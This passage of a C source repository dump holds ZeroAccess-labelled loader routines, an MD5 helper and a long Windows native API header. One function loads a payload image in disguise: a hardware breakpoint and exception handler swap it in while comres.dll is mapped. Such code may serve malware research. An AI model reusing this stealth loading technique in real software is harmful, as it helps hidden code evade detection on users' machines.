(PSIZE_T)*(PSIZE_T)(ExceptionInfo->ContextRecord->Rsp + 0x38);\n\t\t\t*ViewSize = ZACtx->fHeader->OptionalHeader.SizeOfImage;\n\n\t\t\t//*(ULONG_PTR *)ExceptionInfo->ContextRecord->Rsp = (ULONG_PTR)&SfpLdrPostCallHandler;\n#else\n\t\t\tZACtx->ReturnAddress = *(ULONG_PTR *)ExceptionInfo->ContextRecord->Esp;\n\t\t\tZACtx->ViewBase = *(PULONG_PTR)(ExceptionInfo->ContextRecord->Esp + 0xc);\n\n\t\t\tViewSize = (PSIZE_T)*(PSIZE_T)(ExceptionInfo->ContextRecord->Esp + 0x1c);\n\t\t\t*ViewSize = ZACtx->fHeader->OptionalHeader.SizeOfImage;\n\n\t\t\t//*(ULONG_PTR *)ExceptionInfo->ContextRecord->Esp = (ULONG_PTR)&SfpLdrPostCallHandler;\n#endif\n\t\t}\n\t}\n\n\tif (\n\t\t(USER_SHARED_DATA->NtMajorVersion < 6) &&\n\t\t(USER_SHARED_DATA->NtMinorVersion < 2)\n\t\t)\n\t{\n\t\tExceptionInfo->ContextRecord->Dr3 = 0;\n\t}\n\tExceptionInfo->ContextRecord->EFlags |= 0x10000;\n\treturn EXCEPTION_CONTINUE_EXECUTION;\n}\n\nVOID SfLdrLoadPayload(\n\tPVOID PayloadImageBase\n\t)\n{\n\tCONTEXT                  ctx;\n\tNTSTATUS                 status;\n\tPVOID                    ExceptionHandler, DllImageBase = NULL;\n\tDWORD_PTR                ArbitraryUserPointer = 
0;\n\tUNICODE_STRING           DllName;\n#ifdef _DEBUG\n\tANSI_STRING              str;\n#endif\n\tZA_THREAD_CTX            zactx;\n\n\tRtlSecureZeroMemory(&zactx, sizeof(zactx));\n\tzactx.Frame.Context = &g_fctx;\n\tzactx.Frame.Flags = 0;\n\tzactx.PayloadImageBase = (ULONG_PTR)PayloadImageBase;\n\n\tRtlPushFrame((PTEB_ACTIVE_FRAME)&zactx);\n\n\tzactx.fHeader = RtlImageNtHeader(PayloadImageBase);\n\tif (zactx.fHeader) {\n\t\tExceptionHandler = RtlAddVectoredExceptionHandler(1, &SfLdrVehHandler);\n\t\tif (ExceptionHandler) {\n\n#ifdef _DEBUG\n\t\t\tRtlSecureZeroMemory(&DllName, sizeof(DllName));\n\t\t\tRtlInitUnicodeString(&DllName, L\"ntdll.dll\");\n\t\t\tif (NT_SUCCESS(LdrGetDllHandle(NULL, NULL, &DllName, &DllImageBase))) {\n\t\t\t\tRtlInitString(&str, \"NtMapViewOfSection\");\n\t\t\t\tLdrGetProcedureAddress(DllImageBase, &str, 0, &g_pNtMapViewOfSection);\n\t\t\t}\n#else\n\t\t\tg_pNtMapViewOfSection = NtMapViewOfSection;\n#endif\n\n\t\t\tRtlSecureZeroMemory(&ctx, sizeof(CONTEXT));\n\t\t\tctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;\n\t\t\tctx.Dr3 = (DWORD_PTR)g_pNtMapViewOfSection;\n\t\t\tctx.Dr7 = 0x440;\n\n\t\t\tif (NT_SUCCESS(NtSetContextThread(NtCurrentThread(), &ctx))) {\n\n\t\t\t\tRtlInitUnicodeString(&DllName, L\"comres.dll\");\n\n\t\t\t\tLdrEnumerateLoadedModules(0, &SfLdrEnumModules, (PVOID)&DllName);\n\n//save and zero NtTib.ArbitraryUserPointer\n#ifdef _WIN64\n\t\t\t\tArbitraryUserPointer = (DWORD_PTR)__readgsqword(0x28);\n\t\t\t\t__writegsqword(0x28, 0);\n#else\n\t\t\t\tArbitraryUserPointer = (DWORD_PTR)__readfsdword(0x14);\n\t\t\t\t__writefsdword(0x14, 0);\n#endif\n\t\t\t\tstatus = LdrLoadDll(NULL, NULL, &DllName, &DllImageBase);\n\n//restore NtTib.ArbitraryUserPointer\n#ifdef _WIN64\n\t\t\t\t__writegsqword(0x28, ArbitraryUserPointer);\n#else\n\t\t\t\t__writefsdword(0x14, ArbitraryUserPointer);\n#endif\n\t\t\t\tLdrEnumerateLoadedModules(0, &SfLdrEnumModules, NULL);\n\n\t\t\t\tctx.Dr3 = 0;\n\t\t\t\tctx.Dr7 = 
0x400;\n\t\t\t\tNtSetContextThread(NtCurrentThread(), &ctx);\n\t\t\t}\n\t\t\tRtlRemoveVectoredExceptionHandler(ExceptionHandler);\n\t\t}\n\t}\n\tRtlPopFrame((PTEB_ACTIVE_FRAME)&zactx);\n}\n"
  },
  {
    "path": "Source/shared/ldr.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       LDR.H\n*\n*  VERSION:     1.00\n*\n*  DATE:        15 Jan 2016\n*\n*  Common header file for ZeroAccess loader routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nPBYTE SfLdrQueryResourceDataEx(\n\t_In_ PVOID ImageBase,\n\t_In_ CONST LDR_RESOURCE_INFO* ResourceIdPath,\n\t_Out_ ULONG *DataSize\n\t);\n\nPBYTE SfLdrQueryResourceData(\n\t_In_ ULONG_PTR ResourceId,\n\t_In_ PVOID DllHandle,\n\t_In_ PULONG DataSize\n\t);\n"
  },
  {
    "path": "Source/shared/md5.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       MD5.C\n*\n*  VERSION:     1.00\n*\n*  DATE:        15 Jan 2016\n*\n*  ZeroAccess Fast MD5 support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nPMD5Init MD5Init = NULL;\nPMD5Update MD5Update = NULL;\nPMD5Final MD5Final = NULL;\n\n/*\n* SfInitMD5\n*\n* Purpose:\n*\n* Load function pointers for quick MD5.\n*\n*/\nBOOLEAN SfInitMD5(\n\tVOID\n\t)\n{\n\tHMODULE hLib;\n\t\t\n\tif (\n\t\t(MD5Init != NULL) &&\n\t\t(MD5Update != NULL) &&\n\t\t(MD5Final != NULL)\n\t\t)\n\t{\n\t\treturn TRUE;\n\t}\n\t\t\n\thLib = GetModuleHandle(TEXT(\"ntdll.dll\"));\n\tif (hLib == NULL)\n\t\treturn FALSE;\n\n\tMD5Init = (PMD5Init)GetProcAddress(hLib, \"MD5Init\");\n\tMD5Update = (PMD5Update)GetProcAddress(hLib, \"MD5Update\");\n\tMD5Final = (PMD5Final)GetProcAddress(hLib, \"MD5Final\");\n\n\t//report failure if any export is missing, so callers never invoke a NULL pointer\n\treturn (BOOLEAN)((MD5Init != NULL) && (MD5Update != NULL) && (MD5Final != NULL));\n}\n"
  },
  {
    "path": "Source/shared/md5.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       MD5.H\n*\n*  VERSION:     1.00\n*\n*  DATE:        15 Jan 2016\n*\n*  ZeroAccess MD5 support header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef struct {\n\tULONG i[2];\n\tULONG buf[4];\n\tunsigned char in[64];\n\tunsigned char digest[16];\n} MD5_CTX;\n\ntypedef VOID(WINAPI *PMD5Init) (MD5_CTX *context);\ntypedef VOID(WINAPI *PMD5Update)(MD5_CTX *context, const unsigned char *input, unsigned int inlen);\ntypedef VOID(WINAPI *PMD5Final) (MD5_CTX *context);\n\nextern PMD5Init MD5Init;\nextern PMD5Update MD5Update;\nextern PMD5Final MD5Final;\n\nBOOLEAN SfInitMD5(\n\tVOID\n\t);\n"
  },
  {
    "path": "Source/shared/ntos.h",
    "content": "/************************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015, translated from Microsoft sources/debugger\n*\n*  TITLE:       NTOS.H\n*\n*  VERSION:     1.32\n*\n*  DATE:        30 Jan 2016\n*\n*  Common header file for the ntos API functions and definitions.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n************************************************************************************/\n\n#pragma comment(lib, \"ntdll.lib\")\n\n#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int\n\n#define IN_REGION(x, Base, Size) (((ULONG_PTR)x >= (ULONG_PTR)Base) && ((ULONG_PTR)x <= (ULONG_PTR)Base + (ULONG_PTR)Size))\n\n#define ALIGN_DOWN(count,size) \\\n            ((ULONG_PTR)(count) & ~((ULONG_PTR)(size) - 1))\n\n#define ALIGN_UP(count,size) \\\n            (ALIGN_DOWN( (ULONG_PTR)(count)+(ULONG_PTR)(size)-1, (ULONG_PTR)(size) ))\n\n//Access Rights\n\n#define CALLBACK_MODIFY_STATE    0x0001\n#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )\n\n#define DEBUG_READ_EVENT        (0x0001)\n#define DEBUG_PROCESS_ASSIGN    (0x0002)\n#define DEBUG_SET_INFORMATION   (0x0004)\n#define DEBUG_QUERY_INFORMATION (0x0008)\n#define DEBUG_ALL_ACCESS     (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\\\n                              DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)\n\n#define DIRECTORY_QUERY                 (0x0001)\n#define DIRECTORY_TRAVERSE              (0x0002)\n#define DIRECTORY_CREATE_OBJECT         (0x0004)\n#define DIRECTORY_CREATE_SUBDIRECTORY   (0x0008)\n#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)\n\n#define EVENT_QUERY_STATE       0x0001\n#define EVENT_MODIFY_STATE      0x0002  
\n#define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) \n\n#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)\n\n#define IO_COMPLETION_QUERY_STATE   0x0001\n#define IO_COMPLETION_MODIFY_STATE  0x0002  \n#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) \n\n#define KEYEDEVENT_WAIT 0x0001\n#define KEYEDEVENT_WAKE 0x0002\n#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)\n\n#define MUTANT_QUERY_STATE      0x0001\n#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)\n\n#define PORT_CONNECT (0x0001)\n#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1)\n\n#define PROFILE_CONTROL (0x0001)\n#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)\n\n#define SEMAPHORE_QUERY_STATE       0x0001\n#define SEMAPHORE_MODIFY_STATE      0x0002 \n#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)\n\n#define SYMBOLIC_LINK_QUERY (0x0001)\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\n\n#define THREAD_ALERT\t(0x0004)\n\n#define WORKER_FACTORY_RELEASE_WORKER 0x0001\n#define WORKER_FACTORY_WAIT 0x0002\n#define WORKER_FACTORY_SET_INFORMATION 0x0004\n#define WORKER_FACTORY_QUERY_INFORMATION 0x0008\n#define WORKER_FACTORY_READY_WORKER 0x0010\n#define WORKER_FACTORY_SHUTDOWN 0x0020\n\n#define OBJECT_TYPE_CREATE (0x0001)\n#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\n\n#define WMIGUID_QUERY                 0x0001\n#define WMIGUID_SET                   0x0002\n#define WMIGUID_NOTIFICATION          0x0004\n#define WMIGUID_READ_DESCRIPTION      0x0008\n#define WMIGUID_EXECUTE               0x0010\n#define TRACELOG_CREATE_REALTIME      0x0020\n#define TRACELOG_CREATE_ONDISK        0x0040\n#define TRACELOG_GUID_ENABLE          0x0080\n#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100\n#define TRACELOG_CREATE_INPROC        0x0200\n#define TRACELOG_ACCESS_REALTIME      
0x0400\n#define TRACELOG_REGISTER_GUIDS       0x0800\n\n#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 )\n#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )\n#define ZwCurrentProcess() NtCurrentProcess()\n#define ZwCurrentThread()\t NtCurrentThread()\n\n//\n// Define special ByteOffset parameters for read and write operations\n//\n\n#define FILE_WRITE_TO_END_OF_FILE       0xffffffff\n#define FILE_USE_FILE_POINTER_POSITION  0xfffffffe\n\n//\n// This is the maximum MaximumLength for a UNICODE_STRING.\n//\n\n#define MAXUSHORT   0xffff     \n#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )\n\ntypedef struct _UNICODE_STRING {\n\tUSHORT Length;\n\tUSHORT MaximumLength;\n\tPWSTR  Buffer;\n} UNICODE_STRING;\ntypedef UNICODE_STRING *PUNICODE_STRING;\ntypedef const UNICODE_STRING *PCUNICODE_STRING;\n\ntypedef struct _STRING\n{\n\tUSHORT Length;\n\tUSHORT MaximumLength;\n\tPCHAR Buffer;\n} STRING;\ntypedef STRING *PSTRING;\n\ntypedef STRING ANSI_STRING;\ntypedef PSTRING PANSI_STRING;\n\ntypedef STRING OEM_STRING;\ntypedef PSTRING POEM_STRING;\ntypedef CONST STRING* PCOEM_STRING;\ntypedef CONST char *PCSZ;\n\ntypedef struct _CSTRING\n{\n\tUSHORT Length;\n\tUSHORT MaximumLength;\n\tCONST char *Buffer;\n} CSTRING;\ntypedef CSTRING *PCSTRING;\n#define ANSI_NULL ((CHAR)0)\n\ntypedef STRING CANSI_STRING;\ntypedef PSTRING PCANSI_STRING;\n\ntypedef struct _OBJECT_ATTRIBUTES {\n\tULONG Length;\n\tHANDLE RootDirectory;\n\tPUNICODE_STRING ObjectName;\n\tULONG Attributes;\n\tPVOID SecurityDescriptor;\n\tPVOID SecurityQualityOfService;\n} OBJECT_ATTRIBUTES;\ntypedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;\n\ntypedef struct _IO_STATUS_BLOCK {\n\tunion {\n\t\tNTSTATUS Status;\n\t\tPVOID Pointer;\n\t} DUMMYUNIONNAME;\n\n\tULONG_PTR Information;\n} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;\n\n/*\n** Semaphore START\n*/\n\n#ifndef _SEMAPHORE_INFORMATION_CLASS\ntypedef enum _SEMAPHORE_INFORMATION_CLASS {\n\tSemaphoreBasicInformation\n} 
SEMAPHORE_INFORMATION_CLASS;\n#endif\n\n#ifndef _SEMAPHORE_BASIC_INFORMATION\ntypedef struct _SEMAPHORE_BASIC_INFORMATION {\n\tLONG CurrentCount;\n\tLONG MaximumCount;\n} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;\n#endif\n\n/*\n** Semaphore END\n*/\n\n/*\n** FileCache and MemoryList START\n*/\n\ntypedef enum _SYSTEM_MEMORY_LIST_COMMAND {\n\tMemoryCaptureAccessedBits,\n\tMemoryCaptureAndResetAccessedBits,\n\tMemoryEmptyWorkingSets,\n\tMemoryFlushModifiedList,\n\tMemoryPurgeStandbyList,\n\tMemoryPurgeLowPriorityStandbyList,\n\tMemoryCommandMax\n} SYSTEM_MEMORY_LIST_COMMAND;\n\ntypedef struct _SYSTEM_FILECACHE_INFORMATION {\n\tSIZE_T CurrentSize;\n\tSIZE_T PeakSize;\n\tULONG PageFaultCount;\n\tSIZE_T MinimumWorkingSet;\n\tSIZE_T MaximumWorkingSet;\n\tSIZE_T CurrentSizeIncludingTransitionInPages;\n\tSIZE_T PeakSizeIncludingTransitionInPages;\n\tULONG TransitionRePurposeCount;\n\tULONG Flags;\n} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION;\n\n/*\n** FileCache and MemoryList END\n*/\n\n/*\n** Processes START\n*/\n\n#ifndef KPRIORITY\ntypedef LONG KPRIORITY;\n#endif\n\ntypedef enum _THREAD_STATE {\n\tStateInitialized,\n\tStateReady,\n\tStateRunning,\n\tStateStandby,\n\tStateTerminated,\n\tStateWait,\n\tStateTransition,\n\tStateUnknown\n} THREAD_STATE;\n\ntypedef enum _KWAIT_REASON {\n\tExecutive,\n\tFreePage,\n\tPageIn,\n\tPoolAllocation,\n\tDelayExecution,\n\tSuspended,\n\tUserRequest,\n\tWrExecutive,\n\tWrFreePage,\n\tWrPageIn,\n\tWrPoolAllocation,\n\tWrDelayExecution,\n\tWrSuspended,\n\tWrUserRequest,\n\tWrEventPair,\n\tWrQueue,\n\tWrLpcReceive,\n\tWrLpcReply,\n\tWrVirtualMemory,\n\tWrPageOut,\n\tWrRendezvous,\n\tWrKeyedEvent,\n\tWrTerminated,\n\tWrProcessInSwap,\n\tWrCpuRateControl,\n\tWrCalloutStack,\n\tWrKernel,\n\tWrResource,\n\tWrPushLock,\n\tWrMutex,\n\tWrQuantumEnd,\n\tWrDispatchInt,\n\tWrPreempted,\n\tWrYieldExecution,\n\tWrFastMutex,\n\tWrGuardedMutex,\n\tWrRundown,\n\tMaximumWaitReason\n} KWAIT_REASON;\n\ntypedef struct 
_CLIENT_ID {\n\tHANDLE UniqueProcess;\n\tHANDLE UniqueThread;\n} CLIENT_ID, *PCLIENT_ID;\n\ntypedef struct _VM_COUNTERS {\n\tSIZE_T PeakVirtualSize;\n\tSIZE_T VirtualSize;\n\tULONG PageFaultCount;\n\tSIZE_T PeakWorkingSetSize;\n\tSIZE_T WorkingSetSize;\n\tSIZE_T QuotaPeakPagedPoolUsage;\n\tSIZE_T QuotaPagedPoolUsage;\n\tSIZE_T QuotaPeakNonPagedPoolUsage;\n\tSIZE_T QuotaNonPagedPoolUsage;\n\tSIZE_T PagefileUsage;\n\tSIZE_T PeakPagefileUsage;\n\tSIZE_T PrivatePageCount;\n} VM_COUNTERS;\n\ntypedef struct _SYSTEM_THREAD_INFORMATION {\n\tLARGE_INTEGER   KernelTime;\n\tLARGE_INTEGER   UserTime;\n\tLARGE_INTEGER   CreateTime;\n\tULONG           WaitTime;\n\tPVOID           StartAddress;\n\tCLIENT_ID       ClientId;\n\tKPRIORITY       Priority;\n\tKPRIORITY       BasePriority;\n\tULONG           ContextSwitchCount;\n\tTHREAD_STATE    State;\n\tKWAIT_REASON    WaitReason;\n} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESSES_INFORMATION {\n\tULONG NextEntryDelta;\n\tULONG ThreadCount;\n\tLARGE_INTEGER SpareLi1;\n\tLARGE_INTEGER SpareLi2;\n\tLARGE_INTEGER SpareLi3;\n\tLARGE_INTEGER CreateTime;\n\tLARGE_INTEGER UserTime;\n\tLARGE_INTEGER KernelTime;\n\tUNICODE_STRING ImageName;\n\tKPRIORITY BasePriority;\n\tHANDLE UniqueProcessId;\n\tHANDLE InheritedFromUniqueProcessId;\n\tULONG HandleCount;\n\tULONG SessionId;\n\tULONG_PTR PageDirectoryBase;\n\tVM_COUNTERS VmCounters;\n\tIO_COUNTERS IoCounters;\n\tSYSTEM_THREAD_INFORMATION Threads[1];\n} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION;\n\ntypedef enum _PROCESSINFOCLASS {\n\tProcessBasicInformation = 0,\n\tProcessQuotaLimits = 1,\n\tProcessIoCounters = 2,\n\tProcessVmCounters = 3,\n\tProcessTimes = 4,\n\tProcessBasePriority = 5,\n\tProcessRaisePriority = 6,\n\tProcessDebugPort = 7,\n\tProcessExceptionPort = 8,\n\tProcessAccessToken = 9,\n\tProcessLdtInformation = 10,\n\tProcessLdtSize = 11,\n\tProcessDefaultHardErrorMode = 12,\n\tProcessIoPortHandlers = 
13,\n\tProcessPooledUsageAndLimits = 14,\n\tProcessWorkingSetWatch = 15,\n\tProcessUserModeIOPL = 16,\n\tProcessEnableAlignmentFaultFixup = 17,\n\tProcessPriorityClass = 18,\n\tProcessWx86Information = 19,\n\tProcessHandleCount = 20,\n\tProcessAffinityMask = 21,\n\tProcessPriorityBoost = 22,\n\tProcessDeviceMap = 23,\n\tProcessSessionInformation = 24,\n\tProcessForegroundInformation = 25,\n\tProcessWow64Information = 26,\n\tProcessImageFileName = 27,\n\tProcessLUIDDeviceMapsEnabled = 28,\n\tProcessBreakOnTermination = 29,\n\tProcessDebugObjectHandle = 30,\n\tProcessDebugFlags = 31,\n\tProcessHandleTracing = 32,\n\tProcessIoPriority = 33,\n\tProcessExecuteFlags = 34,\n\tProcessTlsInformation = 35,\n\tProcessCookie = 36,\n\tProcessImageInformation = 37,\n\tProcessCycleTime = 38,\n\tProcessPagePriority = 39,\n\tProcessInstrumentationCallback = 40,\n\tProcessThreadStackAllocation = 41,\n\tProcessWorkingSetWatchEx = 42,\n\tProcessImageFileNameWin32 = 43,\n\tProcessImageFileMapping = 44,\n\tProcessAffinityUpdateMode = 45,\n\tProcessMemoryAllocationMode = 46,\n\tProcessGroupInformation = 47,\n\tProcessTokenVirtualizationEnabled = 48,\n\tProcessOwnerInformation = 49,\n\tProcessWindowInformation = 50,\n\tProcessHandleInformation = 51,\n\tProcessMitigationPolicy = 52,\n\tProcessDynamicFunctionTableInformation = 53,\n\tProcessHandleCheckingMode = 54,\n\tProcessKeepAliveCount = 55,\n\tProcessRevokeFileHandles = 56,\n\tProcessWorkingSetControl = 57,\n\tProcessHandleTable = 58,\n\tProcessCheckStackExtentsMode = 59,\n\tProcessCommandLineInformation = 60,\n\tProcessProtectionInformation = 61,\n\tMaxProcessInfoClass = 62\n} PROCESSINFOCLASS;\n\ntypedef struct _PROCESS_BASIC_INFORMATION {\n\tNTSTATUS ExitStatus;\n\tPVOID PebBaseAddress;\n\tULONG_PTR AffinityMask;\n\tKPRIORITY BasePriority;\n\tULONG_PTR UniqueProcessId;\n\tULONG_PTR InheritedFromUniqueProcessId;\n} PROCESS_BASIC_INFORMATION;\ntypedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;\n\ntypedef struct 
_PROCESS_EXTENDED_BASIC_INFORMATION {\n\tSIZE_T Size;\n\tPROCESS_BASIC_INFORMATION BasicInfo;\n\tunion\n\t{\n\t\tULONG Flags;\n\t\tstruct\n\t\t{\n\t\t\tULONG IsProtectedProcess : 1;\n\t\t\tULONG IsWow64Process : 1;\n\t\t\tULONG IsProcessDeleting : 1;\n\t\t\tULONG IsCrossSessionCreate : 1;\n\t\t\tULONG IsFrozen : 1;\n\t\t\tULONG IsBackground : 1;\n\t\t\tULONG IsStronglyNamed : 1;\n\t\t\tULONG SpareBits : 25;\n\t\t} DUMMYSTRUCTNAME;\n\t} DUMMYUNIONNAME;\n} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;\n\n/*\n** Processes END\n*/\n\n#ifndef _SYSTEM_INFORMATION_CLASS\ntypedef enum _SYSTEM_INFORMATION_CLASS\n{\n\tSystemBasicInformation = 0,\n\tSystemProcessorInformation = 1,\n\tSystemPerformanceInformation = 2,\n\tSystemTimeOfDayInformation = 3,\n\tSystemPathInformation = 4,\n\tSystemProcessInformation = 5,\n\tSystemCallCountInformation = 6,\n\tSystemDeviceInformation = 7,\n\tSystemProcessorPerformanceInformation = 8,\n\tSystemFlagsInformation = 9,\n\tSystemCallTimeInformation = 10,\n\tSystemModuleInformation = 11,\n\tSystemLocksInformation = 12,\n\tSystemStackTraceInformation = 13,\n\tSystemPagedPoolInformation = 14,\n\tSystemNonPagedPoolInformation = 15,\n\tSystemHandleInformation = 16,\n\tSystemObjectInformation = 17,\n\tSystemPageFileInformation = 18,\n\tSystemVdmInstemulInformation = 19,\n\tSystemVdmBopInformation = 20,\n\tSystemFileCacheInformation = 21,\n\tSystemPoolTagInformation = 22,\n\tSystemInterruptInformation = 23,\n\tSystemDpcBehaviorInformation = 24,\n\tSystemFullMemoryInformation = 25,\n\tSystemLoadGdiDriverInformation = 26,\n\tSystemUnloadGdiDriverInformation = 27,\n\tSystemTimeAdjustmentInformation = 28,\n\tSystemSummaryMemoryInformation = 29,\n\tSystemMirrorMemoryInformation = 30,\n\tSystemPerformanceTraceInformation = 31,\n\tSystemObsolete0 = 32,\n\tSystemExceptionInformation = 33,\n\tSystemCrashDumpStateInformation = 34,\n\tSystemKernelDebuggerInformation = 35,\n\tSystemContextSwitchInformation = 
36,\n\tSystemRegistryQuotaInformation = 37,\n\tSystemExtendServiceTableInformation = 38,\n\tSystemPrioritySeperation = 39,\n\tSystemVerifierAddDriverInformation = 40,\n\tSystemVerifierRemoveDriverInformation = 41,\n\tSystemProcessorIdleInformation = 42,\n\tSystemLegacyDriverInformation = 43,\n\tSystemCurrentTimeZoneInformation = 44,\n\tSystemLookasideInformation = 45,\n\tSystemTimeSlipNotification = 46,\n\tSystemSessionCreate = 47,\n\tSystemSessionDetach = 48,\n\tSystemSessionInformation = 49,\n\tSystemRangeStartInformation = 50,\n\tSystemVerifierInformation = 51,\n\tSystemVerifierThunkExtend = 52,\n\tSystemSessionProcessInformation = 53,\n\tSystemLoadGdiDriverInSystemSpace = 54,\n\tSystemNumaProcessorMap = 55,\n\tSystemPrefetcherInformation = 56,\n\tSystemExtendedProcessInformation = 57,\n\tSystemRecommendedSharedDataAlignment = 58,\n\tSystemComPlusPackage = 59,\n\tSystemNumaAvailableMemory = 60,\n\tSystemProcessorPowerInformation = 61,\n\tSystemEmulationBasicInformation = 62,\n\tSystemEmulationProcessorInformation = 63,\n\tSystemExtendedHandleInformation = 64,\n\tSystemLostDelayedWriteInformation = 65,\n\tSystemBigPoolInformation = 66,\n\tSystemSessionPoolTagInformation = 67,\n\tSystemSessionMappedViewInformation = 68,\n\tSystemHotpatchInformation = 69,\n\tSystemObjectSecurityMode = 70,\n\tSystemWatchdogTimerHandler = 71,\n\tSystemWatchdogTimerInformation = 72,\n\tSystemLogicalProcessorInformation = 73,\n\tSystemWow64SharedInformationObsolete = 74,\n\tSystemRegisterFirmwareTableInformationHandler = 75,\n\tSystemFirmwareTableInformation = 76,\n\tSystemModuleInformationEx = 77,\n\tSystemVerifierTriageInformation = 78,\n\tSystemSuperfetchInformation = 79,\n\tSystemMemoryListInformation = 80,\n\tSystemFileCacheInformationEx = 81,\n\tSystemThreadPriorityClientIdInformation = 82,\n\tSystemProcessorIdleCycleTimeInformation = 83,\n\tSystemVerifierCancellationInformation = 84,\n\tSystemProcessorPowerInformationEx = 85,\n\tSystemRefTraceInformation = 
86,\n\tSystemSpecialPoolInformation = 87,\n\tSystemProcessIdInformation = 88,\n\tSystemErrorPortInformation = 89,\n\tSystemBootEnvironmentInformation = 90,\n\tSystemHypervisorInformation = 91,\n\tSystemVerifierInformationEx = 92,\n\tSystemTimeZoneInformation = 93,\n\tSystemImageFileExecutionOptionsInformation = 94,\n\tSystemCoverageInformation = 95,\n\tSystemPrefetchPatchInformation = 96,\n\tSystemVerifierFaultsInformation = 97,\n\tSystemSystemPartitionInformation = 98,\n\tSystemSystemDiskInformation = 99,\n\tSystemProcessorPerformanceDistribution = 100,\n\tSystemNumaProximityNodeInformation = 101,\n\tSystemDynamicTimeZoneInformation = 102,\n\tSystemCodeIntegrityInformation = 103,\n\tSystemProcessorMicrocodeUpdateInformation = 104,\n\tSystemProcessorBrandString = 105,\n\tSystemVirtualAddressInformation = 106,\n\tSystemLogicalProcessorAndGroupInformation = 107,\n\tSystemProcessorCycleTimeInformation = 108,\n\tSystemStoreInformation = 109,\n\tSystemRegistryAppendString = 110,\n\tSystemAitSamplingValue = 111,\n\tSystemVhdBootInformation = 112,\n\tSystemCpuQuotaInformation = 113,\n\tSystemNativeBasicInformation = 114,\n\tSystemErrorPortTimeouts = 115,\n\tSystemLowPriorityIoInformation = 116,\n\tSystemBootEntropyInformation = 117,\n\tSystemVerifierCountersInformation = 118,\n\tSystemPagedPoolInformationEx = 119,\n\tSystemSystemPtesInformationEx = 120,\n\tSystemNodeDistanceInformation = 121,\n\tSystemAcpiAuditInformation = 122,\n\tSystemBasicPerformanceInformation = 123,\n\tSystemQueryPerformanceCounterInformation = 124,\n\tSystemSessionBigPoolInformation = 125,\n\tSystemBootGraphicsInformation = 126,\n\tSystemScrubPhysicalMemoryInformation = 127,\n\tSystemBadPageInformation = 128,\n\tSystemProcessorProfileControlArea = 129,\n\tSystemCombinePhysicalMemoryInformation = 130,\n\tSystemEntropyInterruptTimingInformation = 131,\n\tSystemConsoleInformation = 132,\n\tSystemPlatformBinaryInformation = 